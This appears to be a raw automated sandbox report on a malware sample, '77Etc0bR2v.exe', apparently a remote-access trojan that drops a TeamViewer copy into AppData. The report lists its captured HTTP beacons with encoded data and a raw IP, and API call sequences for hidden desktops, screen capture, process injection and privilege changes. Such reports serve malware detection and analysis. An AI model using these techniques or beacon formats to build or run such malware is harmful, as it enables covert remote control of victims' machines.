Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: unknownHTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.6:49758 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3366E0 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectA,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC,2_2_6F3366E0
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard,1_2_00405042
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33A130 CharLowerA,CreateEventA,GetLastError,CloseHandle,GetCurrentThreadId,GetThreadDesktop,CloseHandle,CreateDesktopA,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,CloseHandle,2_2_6F33A130
Source: 77Etc0bR2v.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040323C EntryPoint,7414E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_0040323C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_6F335B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_6F335B40
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_6F335B40
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_004048531_2_00404853
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_004061311_2_00406131
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053C2D63_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004A13AA3_2_004A13AA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053E4303_2_0053E430
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004C97CD3_2_004C97CD
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_005348103_2_00534810
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_005438ED3_2_005438ED
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004AC8A93_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_00544B6A3_2_00544B6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004B9F5A3_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_00546FFB3_2_00546FFB
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004A0FB23_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_0272316112_3_02723161
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_0272283C12_3_0272283C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_0272242412_3_02722424
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_0272200412_3_02722004
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_0272460B12_3_0272460B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_0272316112_3_02723161
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_0272283C12_3_0272283C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_0272242412_3_02722424
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_0272200412_3_02722004
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_0272460B12_3_0272460B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_026F682812_3_026F6828
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_026F710412_3_026F7104
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_026F600012_3_026F6000
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0040F6FE appears 64 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053BCB5 appears 478 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053E5C8 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0040DFA6 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 004A1B0C appears 248 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: String function: 0053BCE8 appears 68 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F333610 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,2_2_6F333610
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,1_2_00401000
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,2_2_6F338510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B1F0 NtSuspendThread,NtClose,2_2_6F33B1F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33ADE0 NtProtectVirtualMemory,2_2_6F33ADE0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33AFC0 NtGetContextThread,NtSetContextThread,2_2_6F33AFC0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,2_2_6F338400
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B270 NtResumeThread,NtClose,HeapFree,2_2_6F33B270
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,2_2_6F33B0A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33AD39 NtProtectVirtualMemory,2_2_6F33AD39
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33A500 NtQueryVirtualMemory,2_2_6F33A500
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,2_2_6F332750
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,2_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,2_2_6F3323B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,2_2_6F337790
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,2_2_6F3319F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33AE20 NtOpenThread,2_2_6F33AE20
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,2_2_6F331C00
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F332640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,2_2_6F332640
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,2_2_6F334EF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,2_2_6F3314E0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache,2_2_6F33B2D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,2_2_6F332ED0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3318D0 NtProtectVirtualMemory,2_2_6F3318D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33AFC0 NtGetContextThread,NtSetContextThread,3_2_6F33AFC0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,3_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33ADE0 NtProtectVirtualMemory,3_2_6F33ADE0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,3_2_6F337790
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,3_2_6F338510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,3_2_6F338400
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B270 NtResumeThread,NtClose,HeapFree,3_2_6F33B270
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B1F0 NtSuspendThread,NtClose,3_2_6F33B1F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,3_2_6F33B0A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33AE20 NtOpenThread,3_2_6F33AE20
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,wsprintfA,CloseHandle,CloseHandle,CloseHandle,3_2_6F334EF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,3_2_6F332ED0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33AD39 NtProtectVirtualMemory,3_2_6F33AD39
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,3_2_6F331C00
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,3_2_6F3319F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3318D0 NtProtectVirtualMemory,3_2_6F3318D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,3_2_6F332750
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F332640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,3_2_6F332640
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33A500 NtQueryVirtualMemory,3_2_6F33A500
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,3_2_6F3314E0
